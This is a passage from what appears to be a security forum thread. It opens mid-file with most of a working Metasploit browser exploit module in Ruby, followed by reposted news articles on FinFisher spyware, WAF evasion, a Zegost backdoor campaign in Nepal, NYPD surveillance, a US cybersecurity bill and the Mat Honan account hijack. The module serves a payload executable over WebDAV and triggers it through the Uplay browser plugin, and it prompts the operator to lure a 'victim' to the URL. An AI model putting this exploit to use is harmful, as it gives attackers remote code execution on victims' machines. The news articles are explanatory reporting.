Found") resp.body = "" resp['Content-Type'] = 'text/html' cli.send_response(resp) end end def prompt_uplay(cli, request) url = "http://" url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe" if path.length > 693 fail_with(Exploit::Failure::Unknown,"Remote path is too long must be < 694 characters") return end cmd = Rex::Text.encode_base64(path) classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39" type = "application/x-uplaypc" # Unused but alternative to classid content = %Q|<html> <body> <script> x = document.createElement('OBJECT'); x.classid='#{classid}'; document.body.appendChild(x); x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play'); </script> </body> </html>| print_status("GET => Exploit") send_response_html(cli, content) handler(cli) end def process_get(cli, request) myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] webdav = "\\\\#{myhost}\\" if blacklisted_path?(request.uri) vprint_status("GET => 404 [BLACKLIST] (#{request.uri})") resp = create_response(404, "Not Found") resp.body = "" cli.send_response(resp) return end if (request.uri.include? @basename) print_status("GET => Payload") return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end # Treat index.html specially if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i) vprint_status("GET => REDIRECT (#{request.uri})") resp = create_response(200, "OK") resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=#{@exploit_unc}#{@share_name}\\"></head><body></body></html>| resp['Content-Type'] = 'text/html' cli.send_response(resp) return end # Anything else is probably a request for a data file... vprint_status("GET => DATA (#{request.uri})") data = "HELLO!" send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end # # OPTIONS requests sent by the WebDav Mini-Redirector # def process_options(cli, request) vprint_status("OPTIONS #{request.uri}") headers = { 'MS-Author-Via' => 'DAV', 'DASL' => '<DAV:sql>', 'DAV' => '1, 2', 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH', 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK', 'Cache-Control' => 'private' } resp = create_response(207, "Multi-Status") headers.each_pair {|k,v| resp[k] = v } resp.body = "" resp['Content-Type'] = 'text/xml' cli.send_response(resp) end # # PROPFIND requests sent by the WebDav Mini-Redirector # def process_propfind(cli, request) path = request.uri vprint_status("PROPFIND #{path}") body = '' my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] my_uri = "http://#{my_host}/" if path !~ /\/$/ if blacklisted_path?(path) vprint_status "PROPFIND => 404 (#{path})" resp = create_response(404, "Not Found") resp.body = "" cli.send_response(resp) return end if path.index(".") vprint_status "PROPFIND => 207 File (#{path})" body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype/> <lp1:creationdate>#{gen_datestamp}</lp1:creationdate> <lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> <lp2:executable>T</lp2:executable> <D:supportedlock> <D:lockentry> <D:lockscope><D:exclusive/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> <D:lockentry> <D:lockscope><D:shared/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> </D:supportedlock> <D:lockdiscovery/> <D:getcontenttype>application/octet-stream</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | # send the response resp = create_response(207, "Multi-Status") resp.body = body resp['Content-Type'] = 'text/xml; charset="utf8"' cli.send_response(resp) return else vprint_status "PROPFIND => 301 (#{path})" resp = create_response(301, "Moved") resp["Location"] = path + "/" resp['Content-Type'] = 'text/html' cli.send_response(resp) return end end vprint_status "PROPFIND => 207 Directory (#{path})" body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>#{gen_datestamp}</lp1:creationdate> <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> <D:supportedlock> <D:lockentry> <D:lockscope><D:exclusive/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> <D:lockentry> <D:lockscope><D:shared/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> </D:supportedlock> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> | if request["Depth"].to_i > 0 trail = path.split("/") trail.shift case trail.length when 0 body << generate_shares(path) when 1 body << generate_files(path) end else vprint_status "PROPFIND => 207 Top-Level Directory" end body << "</D:multistatus>" body.gsub!(/\t/, '') # send the response resp = create_response(207, "Multi-Status") resp.body = body resp['Content-Type'] = 'text/xml; charset="utf8"' cli.send_response(resp) end def generate_shares(path) share_name = @share_name %Q| <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}#{share_name}/</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>#{gen_datestamp}</lp1:creationdate> <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> <D:supportedlock> <D:lockentry> <D:lockscope><D:exclusive/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> <D:lockentry> <D:lockscope><D:shared/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> </D:supportedlock> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> | end def generate_files(path) trail = path.split("/") return "" if trail.length < 2 base = @basename exts = @extensions.gsub(",", " ").split(/\s+/) files = "" exts.each do |ext| files << %Q| <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}#{base}.#{ext}</D:href> <D:propstat> <D:prop> <lp1:resourcetype/> <lp1:creationdate>#{gen_datestamp}</lp1:creationdate> <lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength> <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> <lp2:executable>T</lp2:executable> <D:supportedlock> <D:lockentry> <D:lockscope><D:exclusive/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> <D:lockentry> <D:lockscope><D:shared/></D:lockscope> <D:locktype><D:write/></D:locktype> </D:lockentry> </D:supportedlock> <D:lockdiscovery/> <D:getcontenttype>application/octet-stream</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> <D:ishidden b:dt="boolean">1</D:ishidden> </D:propstat> </D:response> | end files end def gen_timestamp(ttype=nil) ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT") end def gen_datestamp(ttype=nil) ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ") end # This method rejects requests that are known to break exploitation def blacklisted_path?(uri) share_path = "/#{@share_name}" payload_path = "#{share_path}/#{@basename}.exe" case uri when payload_path return false when share_path return false else return true end end def exploit @basename = rand_text_alpha(8) @share_name = rand_text_alpha(8) @extensions = "exe" if datastore['EXPLOITPATH'] @uplay_uri = datastore['EXPLOITPATH'] else @uplay_uri = rand_text_alpha(8) end myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] @exploit_unc = "\\\\#{myhost}\\" if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/') end vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe") print_good("Please let your victim browse to this exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}") super end end
-
There are signs that the FinFisher "lawful interception" spyware may be installed on command-and-control computers in at least ten different countries, including the United States, according new research from Rapid7. Rapid7 researchers analyzed the FinFisher samples obtained from Bahrain to understand how the spyware communicates with its command-and-control computer, according to Claudio Guarnieri, a security researcher with Rapid7. He then looked for those attributes in a global scan of computers on the Internet, and found matches in Australia, Czech Republic, United Arab Emirates, Ethiopia, Estonia, Indonesia, Latvia, Mongolia, Qatar, and the United States, Guarnieri noted in a blog post on Wednesday. FinFisher secretly monitors computers by turning on webcams, recording everything the user types with a keylogger, and intercepting Skype calls. It can also remotely take control of a computer. Gamma International Gmbh, a British company, sells the tool to law enforcement agencies and governments. "We are not able to determine whether they're [detected machines] actually being used by any government agency, if they are operated by local people or if they are completely unrelated at all," Guarnieri wrote. The matches simply indicate that these computers exhibit the "unique behavior associated with what is believed to be the FinFisher infrastructure," Guarnieri wrote. He found that when computers attempted to connect to a server in Bahrain, which had been previously identified by researchers at CitizenLab.org for using FinFisher, the server responded with the message “Hallo Steffi.” Guarnieri found this pattern in computers located in Australia, Czech Republic, United Arab Emirates, Ethiopia, Estonia, Indonesia, Latvia, Mongolia, Qatar, and the United States, and pinpointed the IP addresses. At this time, only the Latvian server is still responding with the message, and all the other machines are "instantly dropping the connection in the exact same way," Guarnieri said. It's not known whether the US-based server identified by Guarnieri is associated with law enforcement or the federal government, or whether a private entity has gotten their hands on the tool. It's also unclear which of the countries identified by Guarnieri are in fact Gamma clients. Gamma International has steadfastly claimed the company only sells FinFisher to governments and not to private actors. That isn't a very reassuring statement, as there is nothing stopping someone from turning around and reselling it to someone outside the government. "Once in the hands of local police, it might be resold/lost/leaked to other parties, who could then use it against the US/US companies/US persons," security and privacy researcher Chris Soghoian told SecurityWeek over email. Human rights activists and security experts have been aware of FinFisher and the possibility of the tool being used to spy on activists and regular citizens, but there haven't been any samples to analyze until recently. In December, WikiLeaks published promotional videos from Gamma that showed how law enforcement agencies could plant FinFisher to monitor a suspect. Mikko Hypponen, chief research officer at F-Secure, said in March the company was looking for a sample in order to add detection to its security software to protect customers "from attack programs—regardless of the source of such programs." The first known analysis of FinFisher came from CitizenLabs.org in July. The researchers received multiple attack emails containing suspicious attachments that had been sent to several activists based in Bahrain. After some analysis, they determined the attachments were all part of the same malware family and linked the Trojan to Gamma's FinFisher spyware tool. Martin Muench, a managing director at Gamma International, told Bloomberg last month the company hadn't sold FinFisher to Bahrain. He said it was likely than an old demonstration version had been copied illegally and modified for malicious use. The malware sample Guarinieri analyzed was disguised as an image file. When opened, the file created a directory and dropped a copy of itself in the new location, Guarnieri wrote in the report. The newly created directory was used for storing dumped data, logs, and screenshots, which were later transferred to a remote command-and-control server. Sursa
-
Hackers’ Investment in Evasion Techniques Proves That They See Web Applications as a Valuable Attack Surface Network security devices, such as network antivirus (AV) solutions or web application firewalls, protect computer systems by stopping malicious traffic before it even reaches them. In order to assess whether the examined traffic is malicious or benign, the security device typically needs to mimic the processing done on the protected system. If the security device interprets the traffic in a different way than the protected system, a semantic gap is created. The attackers can use that semantic gap, in order to create traffic that will bypass the security device, and still create a malicious effect on the protected system. The exploitation of a semantic gap is often called an “evasion technique”. For example, a common rule in network antivirus solutions is to block the transfer of executable files. A naïve antivirus implementation might assess whether a file is an executable based solely on the file extension, while modern operating systems ignore the extension and rely on file headers, by thus creating a semantic gap. The attacker can exploit the semantic gap and with the following “evasion technique”: simply renaming the executable file extension from “.exe” to “.txt” I would like to show why evasion techniques are actually a good thing, as they provide validation for the security market and allow able network security devices to increase the security of the protected systems. Mind the semantic gap Earlier this year, researchers from the University of Texas, published an excellent paper on network antivirus evasion. They give a few reasons why it is very difficult to write a “perfect” processor that precisely replicates the processing semantics of the defended system: • Protocols are often underspecified: Not all corner cases are covered by the protocol specification. For others, the description exists, but may be lacking or vague. • Formats and protocols are usually complex: Replicating the behavior of a given processor is hard—for example, after many years of testing, there are still hundreds of file-parsing discrepancies between OpenOffice and MS Office. • Lax implementation of the protocol in the application – In order to handle even malformed messages, application processing algorithms are much looser than the format specification. Each time two (or more) vendors implement the processing of a certain element in a different way, a virtual junction is created. The network security device has to choose a processing path in that junction. The road not taken usually represents an evasion technique. Evasion is the hackers’ sincerest form of flattery Over the years, a lot of research has been conducted on semantic gaps on the web application arena. Web Application Firewalls (WAFs) evasion techniques has been published based on semantic gaps in application and web servers. Moreover, the hacker’s community is actually using evasion techniques, as SQL injection tools such as Havij and SQLmap contain some explicit anti-WAF evasions. Hackers’ investment in evasion techniques proves that hackers view web applications as valuable attack surface and that WAFs are threat for them, otherwise they would not bother with eluding them. Planting mines on the road not taken We had seen that an evasion technique creates a junction and the WAF must follow the appropriate trail, the same trail the defended application takes. How would a good WAF know the right trail? • Choose the correct path with flexible parsing – allow WAF parsing to be configured according to the specifics of the defended servers. Thus providing support for specific implementation anomalies and bugs. • Don’t go into dark alleys and avoid unnecessary junctions by using: o Protocol hardening – Detect deviations from the protocol to defend against evasion techniques that abuse lax protocol implementation on the server side. o Positive security model hardening – Learn the usual operation of the web application to detect deviations from the application usual operation. Evasion techniques that abuse corner cases on the server side HTTP implementation will probably deviate from application’s normal. A surprising yet very nice corollary of the last argument is the ability to plant mines on the road not taken. The WAF can detect an attack by the detecting the mere use of evasion technique. By using evasion techniques hackers break the most basic principle of hiding as stated by Sherlock Holmes: “the best place to hide something, is where everyone can see it”. The evasion technique usage just draws more attention from the WAF and actually helps the WAF to block the attack. Original Article
-
Researchers have uncovered another attack exploiting a Java vulnerability against activists and government agencies in Nepal. The attack resulted in a backdoor being installed on victims' machines. Two Nepalese government agencies, the National Information Technology Center and the Office of the Prime Minister and Council Minister were targeted in this latest attack, Gianluca Giuliani, a security researcher with Websense, wrote on the Websense Security Labs blog. Attackers injected malicious code designed to exploit a Java Runtime Environment vulnerability on to the agency sites. The attacks relied on code modified from a Metasploit module for that vulnerability, Giuliani added. When triggered, the code installed a backdoor called Zegost onto the victim machines. Zegost is a common remote administration tool and is capable of logging keystrokes, remote code execution, and stealing and transferring data. The backdoor in the Nepalese attacks opened an outbound connection to a remote command-and-control server hosted on "who.xhhow4.com," a domain based in China, Giuliani said. "As in other cases, we can see that this backdoor isn't highly complex at all, but it's certainly no less effective than other complex malware once executed on the target systems," Giuliani wrote. The same Java vulnerability, CVE-2012-0507, had been used in previous attacks against Amnesty International and the Institute for National Security Studies in Israel, Giuliani said. All three attacks used code taken from the Metasploit framework, although that doesn't necessarily indicate a link between them. However, it was noteworthy that the same xhhow4.com domain also hosted the C&C server used in the Amnesty attack, Giuliani noted. Zegost has also been used to target Uyghurs, Tibetans, and other ethnic groups in Eastern and Central Asia, according to AlienVault. The method of infection is familiar, with attackers first compromising the targeted site and then injecting malicious code exploiting a common vulnerability. The main page was infected with a Java JAR file loader, and when executed, it attempted to exploit the Java flaw, Giuliani said. The exploit shellcode then downloads and runs the "tools.exe" executable, which is really Zegost, on to the impacted system. It appears the Office of the Prime Minister and Council Minister website was compromised in May, according to Websense. The backdoor on the impacted system uses local TCP port 1320 to connect to the C&C server on TCP port 53, which is a little unusual. Even though port 53 is generally reserved for the DNS Zone transfer, the traffic over the port used a proprietary protocol, according to Websense. Interestingly, the installed software was signed by valid certificate issued by VeriSign, Giuliani said. Malicious code signed with valid certificates is a trend that we've seen in other targeted attacks, he said. The trend "can reduce the effectiveness of human and automatic countermeasures," he said. Sursa
-
Microsoft helps develop surveillance system that analyzes all sorts of real-time crime data. Microsoft and the New York Police Department have jointly developed a data aggregation and analysis system that allows officers to tap into live video camera feeds, 911 calls, mapped crime statistics, and license plate readers to fight crime. Based on Microsoft technologies, the Domain Awareness System will be available to law enforcement and intelligence agencies around the world, with the city of New York receiving 30 percent of the revenues, New York Mayor Michael Bloomberg and Police Commissioner Raymond Kelly announced today. The system, launched today, can help alert authorities to potential terrorist activities as well as fight everyday crime, Bloomberg said in a press conference at the Lower Manhattan Security Command Center. (Video of the news conference is here.) The center serves as a hub for information from a variety of sources, including network of video cameras that are programmed to sound an alarm if there is an unattended package at the entrance to a building, as well as 600 radiation detectors and more than 100 license plate readers on police cars and at bridges, tunnels and streets. "We're finding new ways to leverage already existing cameras, crime data, and other tools to support the work of our investigators, making it easier for them to determine whether a crime is part of an ongoing pattern," Bloomberg said. For example, the system can alert analysts to the presence of suspicious packages and cars while police search for suspects using smart cameras and license plate readers. The system will be used only to monitor public areas and activities, where no legally protected reasonable expectation of privacy exists," and facial recognition technology is not used, according to the Public Security Privacy Guidelines. (PDF) Video will be retained for 30 days, while metadata, license plate data for five years, and so-called "environmental data" collected by devices designed to detect hazards related to terrorist threats will be held indefinitely. Peter Eckersley, technology projects director at the Electronic Frontier Foundation, told CNET he was worried about the possibility that the system would be abused by officers looking to track down the whereabouts of citizens without having to get a warrant. "It takes a lot of chutzpah for Microsoft and the NYPD to describe location data from license plate readers and surveillance cameras as 'public safety data.' The history of places that we drive our cars is private, and such records would reveal intimate facts about the religion, politics, sexuality, and health of those who drive," Eckersley said in an e-mail. "In the George W. Bush era, Admiral Poindexter promised to build a 'Total Information Awareness' program to wrap America in a layer of ubiquitous high-tech surveillance. But it seems that it took Microsoft and the NYPD to finally bring that vision to life." Sursa
-
With an election looming, parochial partisan politics trumped national security -- shocker, I know -- leaving cybersecurity policy firmly in midair. Even for a Congress whose antics faintly remind one of the last days of the Weimer Republic, this was a bit much. The United States Senate last week was unable to bring up the Cybersecurity Act of 2012 (PDF) for a final vote because of -- shocker -- party politics. Had it passed into law, the bill would have made sure that operators of critical infrastructure -- stuff like nuclear plants and water treatment facilities -- satisfied certain minimum cybersecurity standards, an idea championed by heavy hitters in the defense, national security, and intelligence circles. Not this time, though, as its supporters fell 8 votes short of the 60 needed to overcome a Republican filibuster. And now Congress has left for its summer recess. Priceless. Sen. John McCain (R-Ariz.), who led the opposition, complained that the legislation would have shackled businesses with unnecessary new burdens. Matt Kibbe, a Tea Party fave and head of the conservative group FreedomWorks slammed the bill as "deeply flawed' and said it would stifle innovation on the Internet. The U.S. Chamber of Commerce denounced the idea as a hastily conceived piece of legislation chockablock with regulations that went too far. Senate GOP leader Mitch McConnell later explained that Republicans had decided to filibuster out of a desire to make the legislation better and instead blamed Harry Reid for seeking "to jam something through without any chance for amendment." The Wall Street Journal's editorial board advanced a similar meme, lecturing the Democrats, silly boys, for bringing to the floor a bill that the paper said was unpalatable. Let's give them the benefit of the doubt, election year politics notwithstanding. But this was no bolt from the blue. The legislative horse-trading has been going on for months. In fact, earlier compromises agreed to by the bill's sponsors had watered down the original language to make it more acceptable to the myriad affected constituencies, and the latest version made voluntary a mandate to set security standards for computer networks running the nation's critical infrastructure. It also tweaked certain provisions in the bill to allay concerns expressed by the civil liberties crowd (both the Center for Democracy & Technology and the ACLU are now on board). Did the bill still have warts? Some thought so, and reasonable people can disagree reasonably about that. Then again, reasonableness is on hold until Nov. 5, so the question now is how long ought the country to wait for perfect? "Amendments can be brought on," Robert Rodriguez, chairman and managing principal of the Security Innovation Network, said after the vote. "It's time to place a stake in the ground, to own it and lead it. But this is standard Washington, D.C., politics. We have an election, and some of these politicians, frankly, have to stop putting a finger in the air and trying to guess which way the wind is blowing. It's time to think of the American shareholder and do what's best for the country." That sense of disappointment permeates the defense, national security, and intelligence circles, where the heavy hitters, including the NSA's head general, Keith Alexander, and the chairman of the Joint Chiefs of Staff, Gen. Martin Dempsey, had urged the bill's passage. And at a recent gathering, the Aspen Institute's Homeland Security Group -- more than half of whom were Bush administration appointees -- also threw their support behind the proposal. "The country is already being hurt by foreign cyberintrusions, and the possibility of a devastating cyberattack is real," the group said in a statement. "Congress must act now." Despite the setback, the battle may not be over. On Monday President Obama was reported to be considering issuing an executive order. Also, Leslie Phillips, communications director for the Senate Homeland Security and Governmental Affairs Committee, told my CNET colleague Elinor Mills that one of the bill's co-sponsors, Sen. Joe Lieberman (I-Conn.) remains open to raising the issue again in September. Phillips also said Lieberman is willing to sit down with Republicans to hash things out. However, she said that Republicans need to provide specific language for any amendments they want, rather than a list with 15 placeholders they submitted last week. "GOP opponents insisted that security standards weren't really voluntary or what was now voluntary would soon become mandatory," she said. "We're happy to have open debate and entertain any amendment that is relevant and germane. There were gun amendments and abortion amendments and a lot of others, 218 amendments in all," she said. Seriously? That has little to do with how to improve cybersecurity or defend in case of a cyberwar. (See The Atlantic for a good overview of what a real cyberwar might look like.) But we don't even need to go to the extreme scenario of critical infrastructure getting knocked offline. We're right now suffering through one of greatest transfers of wealth in the history of mankind owing to the theft of intellectual property, and why nobody's talking about that on the national stage remains a mystery. "La guerre! C'est une chose trop grave pour la confier des militaires," said former French Prime Minister Georges Clemenceau. The loose translation: War is too serious a matter to entrust to military men. At the rate we're going, cybersecurity is proving too serious a matter to entrust to the political pygmies in Washington. Sursa
-
After a tech reporter detailed his nightmarish saga of being hacked because of Amazon and Apple security flaws, the e-commerce giant says it has changed its system to make things more secure. When tech reporters get hacked, it seems like tech companies pay attention. Wired reporter Mat Honan's entire online life was compromised by a hacker named Phobia four days ago. Phobia used Honan's AppleCare and Amazon IDs, along with his billing address and last four digits of his credit card to get into his various online accounts. Apple responded yesterday saying that it was looking into how users can reset their account passwords to ensure data protection; and Amazon responded today. "We have investigated the reported exploit, and can confirm that the exploit has been closed as of yesterday afternoon," an Amazon representative told CNET today. What this means is that Amazon customers can no longer make changes to their account settings by telephone, according to PC Magazine. A small but significant change -- because it was by calling Amazon that Phobia eventually succeeded in deleting Honan's Google and Twitter accounts and wiping his MacBook, iPad, and iPhone clean. "In many ways, this was all my fault," Honan wrote in an article for Wired yesterday that detailed his saga. "My accounts were daisy-chained together. Getting into Amazon let my hackers get into my Apple ID account, which helped them get into Gmail, which gave them access to Twitter." The way Phobia gained entry into Honan's Amazon account is by calling the e-commerce giant pretending to be Honan and adding a credit card to his account -- all he needed to do this was Honan's name, e-mail address, and billing address. Then, Phobia called Amazon again and said he couldn't access the account and this is how he was able to use the credit card information to add another e-mail address and reset Honan's password. It all snowballed from there as Phobia was then able to get into Honan's Apple account, call AppleCare, and get access to Honan's iCloud account, and then delete everything. "But what happened to me exposes vital security flaws in several customer service systems, most notably Apple's and Amazon's," Honan wrote. "Apple tech support gave the hackers access to my iCloud account. Amazon tech support gave them the ability to see a piece of information -- a partial credit card number -- that Apple used to release information. In short, the very four digits that Amazon considers unimportant enough to display in the clear on the Web are precisely the same ones that Apple considers secure enough to perform identity verification." Despite Honan having to go through digital hell for security changes to be made at Apple and Amazon, he hopefully has made the Internet just a little bit safer for others. Sursa